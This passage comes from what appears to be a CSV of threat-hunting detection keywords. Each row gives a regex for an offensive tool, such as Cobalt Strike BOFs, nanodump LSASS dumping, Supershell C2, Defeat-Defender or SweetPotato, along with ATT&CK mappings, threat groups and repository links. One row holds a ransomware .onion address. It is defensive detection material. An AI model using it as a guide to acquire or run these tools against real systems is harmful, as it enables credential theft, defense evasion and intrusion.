Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","60650" "*sunnyelf[@hackfun.org]*",".{0,1000}sunnyelf\[\@hackfun\.org\].{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","60651" "*superhedgy/AttackSurfaceMapper*",".{0,1000}superhedgy\/AttackSurfaceMapper.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your 
target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","1","N/A","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","60652" "*Supernova.exe -*",".{0,1000}Supernova\.exe\s\-.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","60653" "*Supernova-main.zip*",".{0,1000}Supernova\-main\.zip.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","60654" "*supershell*winpty.dll*",".{0,1000}supershell.{0,1000}winpty\.dll.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","60655" "*supershell*winpty-agent.exe*",".{0,1000}supershell.{0,1000}winpty\-agent\.exe.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","60656" "*supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion*",".{0,1000}supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60657" "*Supply either a 32-character RC4/NT hash or a 64-character AES256 hash*",".{0,1000}Supply\seither\sa\s32\-character\sRC4\/NT\shash\sor\sa\s64\-character\sAES256\shash.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","60658" "*surajpkhetani/AutoSmuggle*",".{0,1000}surajpkhetani\/AutoSmuggle.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","60676" "*surfsharkvpnstealer*",".{0,1000}surfsharkvpnstealer.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","60677" "*suspended_run *",".{0,1000}suspended_run\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60678" 
"*suspendresume.x64.*",".{0,1000}suspendresume\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60679" "*suspendresume.x86.*",".{0,1000}suspendresume\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 
- T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","60680" "*'svc_smuggling'*",".{0,1000}\'svc_smuggling\'.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","0","N/A","N/A","9","1","54","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z","60681" "*svc_stager.exe*",".{0,1000}svc_stager\.exe.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","60682" "*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60683" 
"*SW2_GetSyscallNumber*",".{0,1000}SW2_GetSyscallNumber.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60684" "*SW2_HashSyscall*",".{0,1000}SW2_HashSyscall.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR 
- Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60685" "*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60686" 
"*SW2_PopulateSyscallList*",".{0,1000}SW2_PopulateSyscallList.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60687" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","N/A","10","10","185","28","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z","60688" "*SW2_RVA2VA*",".{0,1000}SW2_RVA2VA.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60689" "*SW3_GetSyscallAddress*",".{0,1000}SW3_GetSyscallAddress.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","60690" "*Sw4mpf0x/PowerLurk*",".{0,1000}Sw4mpf0x\/PowerLurk.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","1","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","60691" "*swagkarna/Defeat-Defender-V*",".{0,1000}swagkarna\/Defeat\-Defender\-V.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","60692" "*swaks --to * --from * --header *Subject: * --body * --server 
*",".{0,1000}swaks\s\-\-to\s.{0,1000}\s\-\-from\s.{0,1000}\s\-\-header\s.{0,1000}Subject\:\s.{0,1000}\s\-\-body\s.{0,1000}\s\-\-server\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60693" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","60694" "*SwampThing.exe*",".{0,1000}SwampThing\.exe.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60695" "*SwampThing.pdb*",".{0,1000}SwampThing\.pdb.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60696" "*SwampThing.sln*",".{0,1000}SwampThing\.sln.{0,1000}","offensive_tool_keyword","SwampThing","SwampThing lets you spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. 
The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","60697" "*SWbemServicesImplant*",".{0,1000}SWbemServicesImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60700" "*SweetPotato by @_EthicalChaos_*",".{0,1000}SweetPotato\sby\s\@_EthicalChaos_.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","60701" "*sweetpotato 
-p*",".{0,1000}sweetpotato\s\-p.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60702" "*SweetPotato.cna*",".{0,1000}SweetPotato\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Tycx2ry/SweetPotato_CS","1","1","N/A","N/A","10","10","241","48","2020-04-30T14:27:20Z","2020-04-16T08:01:31Z","60703" "*SweetPotato.csproj*",".{0,1000}SweetPotato\.csproj.{0,1000}","offensive_tool_keyword","cobaltstrike","Modified SweetPotato to work with CobaltStrike v4.0","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 